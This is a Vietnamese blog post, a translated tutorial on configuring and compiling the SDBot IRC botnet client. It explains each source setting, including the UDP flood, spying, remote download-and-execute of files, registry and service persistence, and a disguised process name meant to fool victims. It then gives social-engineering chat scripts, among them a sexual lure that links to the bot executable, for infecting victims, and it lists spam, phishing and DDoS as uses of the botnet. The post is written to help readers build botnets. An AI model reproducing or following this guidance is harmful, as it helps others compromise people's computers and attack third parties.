Trao đổi với tôi

http://www.buidao.com

12/27/09

[Virus] Hướng dẫn biên dịch 1 bot cơ bản [Botnet]

Cài đặt SDB0t dành cho người mới tìm hiểu .
-=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+=+=+=+=-
-=+=+=+=+=+=+=+=+=Setting up SDbot for newbies+=+=+=+=+=+=+=-
-=+=+=+=+=+=+=+=+=+=+=+=+=+=+=By+=+=+=+=+=+=+=+=+=+ =+=+=+=+=-
-=+=+=+=+=+=+=hellkid - biên dịch cutynhangheo+=+=+=+=+=+=+=-
-=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+=+=+=+=-

Nội dung :
1. Mục đích hướng dẫn .
2. Các bước cấu hình SDB0t .
3. Làm sao để có được B0T .
4. IRC Server nào được sử dụng khi bạn đã có bots .
5. Những việc có thể làm khi trong tay có bots .
6. Thông tin liên hệ .

================================================== ===========

1. Mục đích hướng dẫn .
Trong TUT dịch này cuty sẽ hướng dẫn cho ae làm sao để cài đặt được SDB0t (chỉnh sửa code và biên dịch)
và làm sao để có được bot, làm sao để có được IRC Server khi đã có bots ...v...v...v...Đây là kiến thức
cơ bản về bot, ai mà không mơ tưởng xây dựng cho mình 1 mạng botnet đúng không nè .Nêu như ae nào đã
có bot được biên dịch thành file chạy (thường được viết bằng C) thì TUT này không dành cho ae đọc .Cuty
biết rằng khi ae download được SDB0t thì sẽ đọc cac file hướng dẫn kèm theo để tinh chỉnh code nhưng lại
không biết sửa cái gì trong đoạn code đó .Vậy thì ở đây cuty xin hướng dẫn cụ thể về mọi thứ liên quan
đến bot cho ae hiểu .

================================================== ===========

2. Các bước cấu hình SDB0t .
Source nguồn của chương trình botnet client ae có thể download tại đây download here .Nào chúng ta tiến
hành cấu hình file "sdbot05b.c" có thể sử dụng notepad của Windows, Edit Plus hoặc cái gì ae biết ...
Di chuyển đến dòng 44 đây chính là dòng bắt đầu chỉnh sửa .

Dòng :

Trích:
#define vername "sdbot 0.5b"

Đây là dòng thể hiện version của bot khi bạn sử dụng command để hỏi version của bot .Bạn có thể tùy ý

sửa đổi theo ý mình để khi có người khác sử dụng con bot của bạn mà không thể biết được version và tên

của con bot do bạn chỉnh sửa và biên dịch lại .

Dòng :

Trích:
// #define NO_IDENT

Đây là dòng có chức năng bật hay tắt tùy chọn IDENT .IDENT là một phương thức chứng thực (method

authentication) và đây là yêu cầu của một số mạng IRC .Dòng này giống với IDENTED trong chương trình

mIRC, ta tiếp tục dòng tiếp theo .

Dòng :

Trích:
// #define NO_SPY

Đây là tùy chọn bật hay tắt chức năng gián điệp (spy) .Đây là tùy chọn gián điệp có nghĩa là trên bất kỳ

1 kênh (channel) nào ae đều có thể có gián điệp, bot ở đâu thì ae có mọi thứ trên kênh đó nếu như bản

thân ae muốn làm .Nếu muốn tắt tùy chọn này hãy xóa "//" trước #define .

Dòng :

Trích:
// #define NO_UDP

Đây là tùy chọn bật hay tắt chức năng tấn công UDP .Tấn công UDP là nguyên nhân làm cho người dùng bị

ngắt kết nối với Internet .Nếu muốn tắt tùy chọn này hãy xóa "//" trước #define .

Dòng :

Trích:
// #define NO_PING

Đây chính là chức năng ping IP, ví dụ ae muốn ping kiểm tra 1 IP nhưng muốn bot thực hiện việc ping

trên ae cần sử dụng command sau : "!ping 203.162.4.190" .Khi đó bot sẽ thực hiện lệnh ping tới IP trên

và trả kết quả về cho ae .Nếu muốn tắt tùy chọn này hãy xóa "//" trước #define .

Dòng :

Trích:
// #define NO_NETINFO

Đây là chức năng sẽ hiển thị thông tin internet của bot khi kết nối nới IRC Server của ta .Tất nhiên là

cả tốc độ kết nối internet, kiểm tra kết nối (LAN hay Dialup) và mọi thứ liên quan .Nếu muốn tắt tùy

chọn này hãy xóa "//" trước #define .

Dòng :

Trích:
// #define NO_REDIRECT

Port redirect (trực tiếp) nghĩa là sẽ forwarding (chuyển hướng) những kết nối đó từ 1 port này tới 1

được chỉ định .Ví dụ khi ae kết nối tới 1 IRC Server tên irc.cutynhangheo.net, ae sẽ kết nối tới IRC

Server ở port 7000 .Ae cũng có thể kết nối tới Server trên port được chỉ định ví dụ 1980, với điều

kiện irc.cutynhangheo.net có mở port 1980, nó sẽ phát sinh ra ngẫu nhiên đối với bot nghĩa là sẽ chuyển

trực tiếp những kết nối ở port 7000 tới port 1980 .Nhưng ae lại muốn kết nối lần đầu đối với 1 bot và

bot sẽ được chuyển trực tiếp kết nối tới Server khi ae có set redirection (chuyễn trực tiếp) trên bot .

Nếu muốn tắt tùy chọn này hãy xóa "//" trước #define .

Dòng :

Trích:
// #define NO_DOWNLOAD

Đây là chức năng bất kỳ nơi nào ae cũng có thể buột bot phải download mọi file mà ae muốn và thực thi

file đó trên PC có bot .Ví dụ với command sau "!get http://www.cutynhangheo.net/test.exe" (hoặc bất kỳ

file nào) .Đây là chức năng sử dụng để cập nhật cho bot hoặc đưa thêm 1 botnet khác vào zombie (bot

khác với bot SDB0t) .Nếu muốn tắt tùy chọn này hãy xóa "//" trước #define .

Dòng :

Trích:
// #define NO_VISIT

Đây là chức năng thăm dò 1 site nào đó .Được hiểu như thế này khi ae có 1 site trong danh sách và muốn

có ít thông tin về nó trước khi tấn công, ae có thể sử dụng bot để thăm dò site đó .Nếu muốn tắt tùy chọn

này hãy xóa "//" trước #define .

Dòng :

Trích:
// #define NO_CONNCHECK

Đây là chức năng được xây dựng trên bot, bot sẽ kiểm tra kết nối internet trước khi bot kết nối lại với

IRC Server, cái này do ae set cho bot .Việc này được thay thế khi kết nối với IRC được lặp lại sau khi

không có kết nối với internet .Nếu muốn tắt tùy chọn này hãy xóa "//" trước #define .

Bây giờ cuty xin chia sẽ với ae về kinh nghiệm của các bí danh (nick) .Bí danh gần giống khi được sử

dụng trong mIRC .Nói đến đây thì ae có thể hiểu là cần sử dụng mIRC script để tạo bí danh cho các bot

của mình (ví dụ : "!op") và bạn sẽ dễ dàng tìm được bot của mình .Đó chính là cái hay của bí danh trong

mIRC .Ae cần có những bot có bí danh đang ký 1 cách đễ nhớ, để khi thăm dò bí danh bằng command (ví dụ :

"!cuty1") .Vì nếu không sử dụng mIRC script trên để kiểm tra có phải bot của mình hay không thì sao ae

dám sử dụng đúng hok nè

Nào bây giờ đến phần cấu hình cho bot đây lày, ae tìm đến dòng 65 có đoạn note này là phần cho bot

Dòng :

Trích:
// bot configuration

Đến dòng 66 :

Trích:
const char botid[] = "set_me"

Đây là bot id (là gì thì tự hiểu), giá trị "set_me" là tùy biến ae muốn đặc tên bot sao cho dễ nhớ .

Đến dòng 67 :

Trích:
const char password[] = "set_me"

Đây là password cho bot (tại sao thì dễ hiểu), giá trị "set_me" là tùy biến ae muốn đặt pass cho bot .

Tránh tình trạng bị các tên dogger sử dụng của mình .

Đến dòng 68 :

Trích:
const int maxlogins = 4

Đây là phần dùng để giới hạn số người log vào bot trong cùng 1 thời điểm .

Đến dòng 69 :

Trích:
const char server[] = "set_me"

Đây là phần chỉ định server mà bot phải kết nối tới, giá trị "set me" là tùy biến ae muốn đặt tên IRC

Server của mình để bot kết nối tới .

Đến dòng 70 :

Trích:
const int port = 6667

Đây là phần chỉ định port mà server đang open chờ kết nối của bot, giá tri port '6667' là tùy biến ae

muốn open port nào trên IRC Server đều được .

Đến dòng 71 :

Trích:
const char serverpass[] = ""

Dây là phần cấu hình cho password của server tùy chọn .

Đến dòng 72 :

Trích:
const char channel[] = ""

Đây là kênh trên IRC Server để bot tham gia vào (để dễ phân loại ấy mà) .Giá trị "" là tên của channel .

Đến dòng 73 :

Trích:
const char chanpass[] = ""

Đây là phần thiết lập password cho channel .Tránh tình trạng như đã nói trên .

Đến dòng 74 :

Trích:
const char server2[] = ""

Đây là phần IRC server dự phòng .

Đến dòng 75 :

Trích:
const int port2 = 6667

Giống như dòng 70 và để làm gì thì giống dòng 75 .

Đến dòng 76 :

Trích:
const char channel2[] = ""

Giống như dòng 72 và để làm gì thì giống dòng 75 .

Đến dòng 77 :

Trích:
const char chanpass2[] = ""

Giống như dòng 73 và để làm gì thì giống dòng 75 .

Đến dòng 78 :

Trích:
const BOOL topiccmd = FALSE

Đây là chức năng sẽ bật hay tắt topic khi bot vào channel .

Đến dòng 79 :

Trích:
const BOOL rndfilename = FALSE

Đây là chức năng sẽ tạo tên file random khi ae biên dịch file này thành bot .Xin lưu ý ae khi sử dụng

chức năng này thì phải nhớ tên file bot của mình đấy .

Đến dòng 80 :

Trích:
const char filename[] = "syscfg32.exe"

Đây là tên file của con bot khi ae biên dịch ra .Ae có thể sửa thành tên file nào mình yêu thích .

Đến dòng 81 :

Trích:
const BOOL regrun = TRUE

Đây là phần sẽ khai báo con bot của ae có chạy trong registry hay không ? Vì cần lưu ý nhiều khi ae sẽ

không kích hoạt được bot khi hệ thống của victim hoạt động .

Đến dòng 82 :

Trích:
const BOOL regrunservices = TRUE

Dòng này cũng mang tính chất như dòng 81, nhưng giá trị được reg thành 1 service chạy trong hệ thông 1

cách hợp pháp giống như mọi service của hệ thống nguyên thủy

.

Đến dòng 83 :

Trích:
const char valuename[] = "Configuration Loader"

Dòng này sẽ là giá trị tên của bot khi chạy trong processes của hệ thống, giá trị thì ae thích đặt gì tùy

ý .Và khi victim nhấn "Ctrl + Alt + Delete" sẽ thấy được trong processes tên của con bot đang chạy (ở đây

tùy thuộc vào kỹ năng lừa đảo của ae

) .

Đến dòng 84 :

Trích:
const char prefix = '.'

Dòng pefix này mang ý nghĩa gì và nó được khai báo trước khi biên dịch bot .Ví dụ ae muốn ra lệnh cho bot

ping tới IP nào đó bằng câu lệnh : "ping 203.162.4.190" , thì bot sẽ không hiêu được ae đang ra lệnh gì

cho nó nhưng nếu ae sử dụng câu lệnh này thì bot sẽ hiểu được ae muốn làm gì : ".ping 203.162.4.190" .Dấu

"." là giá trị được khai báo của prefix, ae có thể thay đổi dấu "." này thành bất kỳ dấu gì ae thích "@",

"$", "#", "%" ...vvv...vvv...

Đến dòng 85 :

Trích:
const char version[] = "sdbot v0.5b by [sd]"

Dòng này dùng để khai báo tác quyền của mình, quá dễ hiểu

) .

Đến dòng 86 :

Trích:
const int cryptkey = 0

Dòng này có giá trị sẽ mã hóa key publish của bot (nhưng không support cho SDB0t

) .

Đến dòng 87 :

Trích:
const int maxaliases = 16

Đây là phần giới hạn chiều dài ký tự của aliases (Quá dễ hiểu) .Đến đây ta đã chuẩn bị xong phần source

để tạo 1 con bot, ta bắt biên dịch nó .Ae có thể sử dụng chương trình "lcc-win" để biên dịch con bot ta

vừa hiệu chỉnh xong, ae cài đặt "lcc-win" để biên dịch con bot và mở file "make-lcc.bat" kèm theo trong

source cuty send cho ae và sửa dòng 6 chỉ về đường dẫn thư mục ae setup "lcc-win" .Chúc may mắn


================================================== ===========

3. Làm sao để có được B0T .

Điều này sẽ có nhiều ae thắc mắc và muốn hỏi cuty .Xin trả lời với ae là tùy thuộc vào khả năng, tài nghệ

và ma lanh của ae mà có thể đánh lừa, phát tán được con bot của mình cho nhiều victim bị lây nhiễm .Khi đó

ae sẽ là ai trong hệ thống máy tính ma này ? "Once adminstrator for botnets" .Chúc ae sẽ may mắn trong bước

này .Dưới đây là một số TUT về mẹo lừa đảo xin cung cấp để ae tham khảo

Trong IRC sử dụng mIRC :

Trích:
Ae có thể sử dụng script xì pem gần như Y!M

Trong MSN :

Trích:
Ae có thể soạn 1 email send cho victim và chèn 1 đường link mà trong đường link có ẩn con bot của
ae (bằng cách nào ẩn file trong link thì tự tìm hiểu nhé )

--== [ Đây là 1 ví dụ trong MSN chat ] ==--
kewlgirl : hi wolf_man
wolf_man : hey kewlgirl, how are you ?
kewlgirl : i'm fine wolf_man..
kewlgirl : tell me wolf_man what do you like ?
wolf_man : hmm music, reading, watching movies..etc what about you ?
kewlgirl : I love music, But do you want to know what i realy like ??
wolf_man : what ??
kewlgirl : to get laid
kewlgirl : do you have a pictuer wolf_man ?
wolf_man : yes i can send you it.
( wolf_man sends his picture to kewlgirl )
kewlgirl : OH your so HOT, i would love to get fucked by you.
wolf_man : do you have a pictuer kewlgirl ?
kewlgirl : yes and its a very hot one too
kewlgirl : here is my home page where you will find my pictuers
www.cutynhangheo.com/file_bot.exe
( Luôn nhớ rằng làm sao file file_bot.exe luôn là màu trắng để victim không nghi ngờ )
( Khi victim mở site ra, họ phải download file_bot.exe và mở nó ra,Bằng chéo họ đã trở thành bot
của ae )

Trong Yahoo :

Trích:
--== [ Như trên ] ==--
--== [ Cách thứ 2 ] ==--
Tham gia phong chat nào đó và send file cho mọi người

Trong các code Web App :

Trích:

add this after

"file_bot.exe" chính là con bot ae đã biên dịch thành file chạy .

Nói chung là có rất nhiều cách để ae có thể get được bot cho mình, trên đây chỉ là mang tính chất tham khảo .


================================================== ===========

4. IRC Server nào được sử dụng khi bạn đã có bots .

Đây mới là phần hấp dẫn của TUT dịch bài này đây

.Ok ! bây giờ thì ae đã biên dịch bot thành cong và đã

get được 1 số lượng bots kha khá .Và ae bắt đầu có câu hỏi IRC Server nào để ta sử dụng khi đã có 1 số lượng

bots kha khá .Cũng đã từng có nhiều người có suy nghĩ giống ae (điển hình là cuty đây

) .

4.1 Những IRC Server có rất nhiều ở trên internet .Ví dụ : irc.undernet.org, irc.EFnet.net ...Đây là những

server IRC có rất nhiều người tham gia nen ae yên tâm admin của các Server này sẽ không biết được đâu là ]

người chat thật đâu là bot đâu

.

4.2 Cách này thì tự hiểu, tự xây dựng cho mình 1 IRC Server riêng (Cái này Advances cuty sẽ viết) .

4.3 Cách này thì khó khăn hơn, ae vào 1 kênh (channel) và sử dụng command "#help" để kiểm tra .Nếu việc trả

lời "#help" nhanh khi ae đang thực hiện thì quá tuyệt, còn nếu không trả lời thì bỏ đừng quan tâm đến những

kệnh (channel) đó .


================================================== ===========

5. Những việc có thể làm khi trong tay có bots .

Những việc mà hệ thống máy tính ma botnet có thể làm chính là :

Trích:
- Spam thư quảng cáo .
- Phát tán thư rác .
- Lừa đảo trực tuyến (Phishing).
- Deny of Service (DoS, DDoS).
...

================================================== ===========

6. Thông tin liên hệ .

Mọi thắc mắc về bài dịch ae có thể contact với cuty qua các thông tin sau :

Trích:

nick : cutynhangheo

Y!M : crackforme2004

E-mail :

cutynhangheo@gmail.com

Site :

http://thegioimang.org

Người đăng: luongkhiem

RefLink:http://thegioimang.org/security/huong-dan-bien-dich-1-bot-co-ban-%5Bbotnet%5D.html